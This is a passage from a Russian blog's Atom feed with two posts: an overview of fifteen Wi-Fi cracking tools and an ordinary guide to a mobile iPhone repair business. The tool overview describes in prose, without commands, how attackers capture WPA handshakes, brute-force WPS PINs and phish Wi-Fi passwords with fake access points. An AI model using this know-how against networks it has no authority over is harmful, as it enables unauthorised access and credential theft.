  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:HyqV9u-vm</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/HyqV9u-vm?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Большой обзор программ для взлома Wi-Fi</title><published>2018-08-27T13:18:41.922Z</published><updated>2018-08-27T13:18:41.922Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/dc/dcc5aed4-7fa2-478a-ad16-dfcb01b8f8ca.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/62/62854d17-5d4c-4287-81b5-07de5560886f.png&quot;&gt;В наше время беспроводные сети используются буквально повсюду. Это быстро, удобно, надежно, не требует размещать множество кабелей по дому и дает свободу передвижения при использовании устройства. Технология Wifi разрабатывалась как безопасная сеть, к которой могут получить доступ только те участники, у которых есть пароль. Но со временем люди находили уязвимости в самом протоколе и в его реализациях, из-за чего сети становились небезопасными.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/62/62854d17-5d4c-4287-81b5-07de5560886f.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В наше время беспроводные сети используются буквально повсюду. Это быстро, удобно, надежно, не требует размещать множество кабелей по дому и дает свободу передвижения при использовании устройства. Технология Wifi разрабатывалась как безопасная сеть, к которой могут получить доступ только те участники, у которых есть пароль. Но со временем люди находили уязвимости в самом протоколе и в его реализациях, из-за чего сети становились небезопасными.&lt;/p&gt;
  &lt;p&gt;Соответственно, выпускались новые версии протокола, закрывающие старые проблемы. Так сначала появился алгоритм шифрования WEP, затем WPA и WPA2. Последний является самым надежным на данный момент. Но за это время было создано множество инструментов для тестирования безопасности Wifi и взлома. Если вы хотите быть уверенными что ваша сеть в безопасности, вам лучше знать чем могут пользоваться злоумышленники для атаки на нее. В этой статье мы собрали самые популярные программы для взлома Wifi.&lt;/p&gt;
  &lt;h3&gt;ПРОГРАММЫ ДЛЯ ВЗЛОМА WI FI&lt;/h3&gt;
  &lt;h3&gt;1. AIRCRACK&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/image_thumb5.png&quot; width=&quot;695&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Первый в нашем списке — Aircrack или Aircrack-ng. Это лучшая программа для взлома wi fi и самый популярный инструмент для тестирования безопасности беспроводных сетей. По сути, это набор инструментов, которые могут практически все, но работают только из командной строки. Каждый инструмент из набора выполняет четко одну свою функцию. Вот основные из функций — поиск доступных сетей и просмотр подробной информации о них (airodump), захват сетевых пакетов и их фильтрация (airodump), настройка сетевого интерфейса для работы в режиме монитора (airmon), отправка пакетов в сеть (aireplay), перебор паролей с помощью алгоритмов или словаря (aircrack), расшифровка трафика (airdecap).&lt;/p&gt;
  &lt;p&gt;Принцип действия довольно прост, сначала злоумышленник должен переключить карту в режим монитора, затем найти вашу сеть и начать собирать с нее пакеты или другие данные. Как только он получит то что ему нужно, перейдет к перебору пароля. В случае c WEP будет достаточно только большого количества пакетов и пароль будет найден с вероятностью 100%. Для WPA нужно перехватить рукопожатие, которое передается в момент, когда вы подключаетесь к сети. А дальше его можно перебирать по словарю. Чем проще пароль тем быстрее он будет перебран. Программа кроссплатформенная и может работать в Windows и в Linux.&lt;/p&gt;
  &lt;h3&gt;2. AIRSNORT&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/airsnort-linux-001.jpg&quot; width=&quot;600&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;AirSnort — это еще одна популярная утилита для получения пароля от Wifi сети. Только работает она лишь с WEP сетями. Пароль перебирается с помощью специальных алгоритмов. Программа мониторит все передаваемые в сети данные, и когда перехватывает достаточное количество пакетов — расшифровывает из них пароль. Доступна для Linux и Windows, а также очень проста в использовании. Последний раз программа обновлялась три года назад, но она все еще актуальна и работает.&lt;/p&gt;
  &lt;h3&gt;3. KISMET&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/hacker-tool-kismet.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Kismet — программа другого типа. Это анализатор беспроводных сетей WiFi 802.11a/b/g/n и система обнаружения вторжений. Очень часто этот инструмент используется для решения проблем с сетями Wifi. Kismet отлично работает со всеми wifi картами, которые поддерживают режим монитора. Поддерживает Windows, Linux, MacOS и BSD. Программа позволяет перехватывать пакеты разных протоколов — a/b/g/n, а также обнаруживать скрытые сети. Если к компьютеру подключен GPS, то программа может сохранять место где была найдена сеть на карту.&lt;/p&gt;
  &lt;h3&gt;4. FERN WIFI WIRELESS CRACKER&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/main_window.png&quot; width=&quot;751&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Еще один неплохой инструмент, который поможет улучшить безопасность беспроводных сетей. Он позволяет просматривать передаваемые пакеты в реальном времени, а также обнаруживать устройства, подключенные к сети. Программа была разработана для выявления недостатков в протоколах сетей и их устранения. Работает на Linux, Windows, MacOS.&lt;/p&gt;
  &lt;p&gt;Программа может восстанавливать ключи WEP/WPA так же, как это делает Aircrack, а также ключи WPS методом перебора. Также может использоваться для тестирования сетей Ethernet. Для взлома ключей WPA/WPA2 используется перебор по словарю, а для WEP доступны такие алгоритмы: Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay. Инструмент активно разрабатывается и постоянно получает новые функции.&lt;/p&gt;
  &lt;figure&gt;
    &lt;iframe src=&quot;https://www.youtube.com/embed/eVyw3NIGEBE&quot;&gt;&lt;/iframe&gt;
  &lt;/figure&gt;
  &lt;h3&gt;5. COWPATTY&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/Cowpatty-1.jpg&quot; width=&quot;560&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;CoWPAtty — программа для взлома wi fi на пк методом перебора паролей WPA/WPA2 с использованием радужных таблиц. Это вариант атаки по словарю, который работает немного быстрее обычного перебора. Утилита не умеет перехватывать рукопожатия. Ей нужно передать уже перехваченные пакеты. Работает все в интерфейсе командной строки. Если пароль есть в списке, то программа его найдет. Но скорость работы программы очень сильно зависит от сложности паролей и их количества.&lt;/p&gt;
  &lt;p&gt;Для обозначения имени SSID используется SHA1, а это означает что для разных точек доступа придется создавать новую радужную таблицу. В новых версиях разработчики попытались увеличить скорость с помощью использования файла хэшей, который содержит 172000 записей и более 1000 самых популярных SSID.&lt;/p&gt;
  &lt;h3&gt;6. AIRJACK&lt;/h3&gt;
  &lt;p&gt;Airjack выполняет функции, схожие с aireplay. Это утилита для отправки пакетов в беспроводную сеть. Она может использоваться для выполнения атак отказа в обслуживании и MITM атак. Это может быть полезно при создании фейковой точки доступа, когда вам нужно заглушить основную.&lt;/p&gt;
  &lt;h3&gt;7. WEPATTACK&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/url.png&quot; width=&quot;617&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Еще один простой инструмент для взлома паролей для сетей WEP. Как и предыдущие подобные инструменты в списке он позволяет восстанавливать пароль из достаточного количества перехваченных пакетов. Но для работы программы нужна карта с поддержкой режима монитора.&lt;/p&gt;
  &lt;h3&gt;8. WIFIPHISHER&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/hacker-tool-wifiphisher.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Работа этого инструмента очень сильно отличается от того что мы видели ранее. Если все описанные выше инструменты нацелены на технические уязвимости протокола, то здесь используется социальный инжиниринг. Утилита получает пароль от WPA/WPA2 сети методом фишинга. Она отключает пользователя от его сети и подключает к своей. А затем выдает в браузере сообщение, что пользователь должен ввести пароль от Wifi для установки обновлений. Затем пароль передается взломщику, а пользователь продолжает пользоваться интернетом не подозревая что произошло.&lt;/p&gt;
  &lt;h3&gt;9. REAVER&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/Reaver-Download-Hack-WPS-Pin-WiFi-Networks-640x327.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Reaver — это программа для взлома пароля wifi, которая позволяет получать пароль от сетей WPS путем прямого перебора. Работа утилиты основана на том, что PIN WPS можно пробовать неограниченное количество раз. Обновлялся последний раз 4 года назад и большинство роутеров уже получили защиту от уязвимости, но не все.&lt;/p&gt;
  &lt;h3&gt;10. WIFITE&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/wifite-is-quitting.jpg&quot; width=&quot;480&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Wifite — инструмент, похожий на Reaver, тоже написанный на Python и тоже предназначенный для взлома сетей WPS. Действует аналогичным методом перебора, но более новый и имеет несколько дополнительных функций. Работает только в Linux.&lt;/p&gt;
  &lt;h3&gt;11. WEPDECRYPT&lt;/h3&gt;
  &lt;p&gt;WepDecrypt — инструмент для взлома WEP сетей, написанный на Си. Поддерживаются несколько методов взлома ключей, начиная от атаки по словарю и заканчивая алгоритмами анализа. Для работы программы нужны некоторые системные библиотеки.&lt;/p&gt;
  &lt;h3&gt;12. PYRIT&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/33.png&quot; width=&quot;737&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Pyrit — отличный инструмент для выполнения атак перебора по словарю на протоколы WPA/WPA2. Написан на Python и может работать на FreeBSD, Linux, Windows и MacOS. Утилита поддерживает параллельные вычисления с помощью видеокарты, используя Cuda или OpenCL, а значит может быть очень эффективной. Но это все еще атака по словарю, а значит чем сложнее пароль, тем он безопаснее.&lt;/p&gt;
  &lt;h3&gt;13. INFERNAL TWIN&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/inferal-1000x506.jpg&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Evil twin (злой двойник) — это инструмент для создания фейковой точки доступа Wifi. Пользователь подключается не оригинальной точке доступа, а к фейковой и передает ей свои данные. Она может использоваться для кражи паролей, перехвата трафика, фишинга и многого другого.&lt;/p&gt;
  &lt;h3&gt;14. PIXIEWPS&lt;/h3&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://losst.ru/wp-content/uploads/2017/10/1-2.png&quot; width=&quot;709&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Pixiewps — это новый инструмент для подбора PINов к WPS написанный на Си. Поддерживается перебор PIN офлайн без подключения к сети, поиск уязвимых сетей и использование атаки Pixie Dust. Для работы нужна модифицированная версия Wifite или Reaver.&lt;/p&gt;
  &lt;h3&gt;15. CRUNCH&lt;/h3&gt;
  &lt;p&gt;Простая утилита, которую можно использовать для генерации списков слов и словарей на основе определенных последовательностей.&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:Sky7G2p8m</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/Sky7G2p8m?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Заработок на выездном ремонте техники Apple</title><published>2018-08-24T16:28:07.151Z</published><updated>2018-08-24T16:28:07.151Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/a6/a64bb0a1-30a4-448d-be14-1a37739fcdd8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/23/23e64d93-7223-4046-ba23-6d606b2c8833.png&quot;&gt;Сегодня подготовил для вас схему, которая описывает принцип работы и некоторые фишки такой ниши, как выездной ремонт Apple техники! И так, поехали!</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/23/23e64d93-7223-4046-ba23-6d606b2c8833.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Сегодня подготовил для вас схему, которая описывает принцип работы и некоторые фишки такой ниши, как выездной ремонт Apple техники! И так, поехали!&lt;/p&gt;
  &lt;p&gt;Делаем ценники ниже &amp;quot;топовых&amp;quot; контор, чем в Вашем городе. Изучите свою ЦА, но на практике огромным спросом пользуется у людей, с хорошим достатком, потому что им никуда не нужно ехать.&lt;/p&gt;
  &lt;p&gt;На первое время закуп расходников и запчастей делайте у самого &amp;quot;бюджетного&amp;quot; поставщика в Вашем городе, нет смысла заказывать с Китая, ждать 20 дней из за экономии до 500 рублей (здесь главный фактор, это быстрота сервиса).&lt;/p&gt;
  &lt;p&gt;У большинства людей рабочий график совпадает с графиком ремонтных мастерских, другая категория людей слишком ценит своё время, и услуга по ремонту айфонов с выездом на дом или в офис просто находка. Чистая прибыль с ремонта одного айфона составляет от 1500 до 5000 рублей.&lt;/p&gt;
  &lt;p&gt;Рассмотрим пример с заменой дисплея. Среднее время ремонта 25-30 минут, стоимость китайского дисплея 2000 рублей, наша наценка на дисплей 1500 рублей, услуга замены - 2000 рублей, итого 3500 рублей с одного выезда.&lt;/p&gt;
  &lt;p&gt;Конструкция айфона позволяет производить все работы без использования паяльника, всё, что нужно - набор отверток и медиатор.&lt;/p&gt;
  &lt;p&gt;Далее с приливом финансов и изучением топов ремонтов (как правило на первом месте это дисплейная сборка) заказывайте уже с Китая хорошими партиями от 20 штук.&lt;/p&gt;
  &lt;p&gt;Реклама. Реклама самый топ считаю инстаграм и сарафан, не мучайтесь с лендингом, версткой и Директом, зря тратите время! Но никогда не жадничайте на рекламе, это ваши заказы и деньги! Мастеров ищите двух, первый это модульщик, который меняет расходники (дисплей, АКБ) - на первое время этого вполне хватит.&lt;/p&gt;
  &lt;p&gt;Далее мастер по пайке плат, там уже когда у Вас появляются какие либо достаточные финансы сразу снимите ему небольшое место (9кв метров вполне хватит пайщику) и прикупите ему начальное оборудование. Пайщик чинит платы (реболл микросхем и чистка после влаги) Но здесь уже нужен курьер, который привозит ремонтопригодные платы Ваших клиентов пайщику.&lt;/p&gt;
  &lt;p&gt;И самое важное правило, Ваш клиент не должен ехать к Вам сам, вы должны приехать к нему для максимального комфорта вашего Сервиса!&lt;/p&gt;
  &lt;p&gt;P.S. Как вариант, можете объединиться с человеком, который продает RFB (восстановленные) iPhone, вы будете за три копейки чинить ему iPhone по гарантии (кто сталкивался с RFB iPhone, точно меня поймет) Он в свою очередь своим клиентам будет советовать только Ваш сервис, давая, например, с чеком Вашу визитку. Вот такое партнерство.&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry></feed>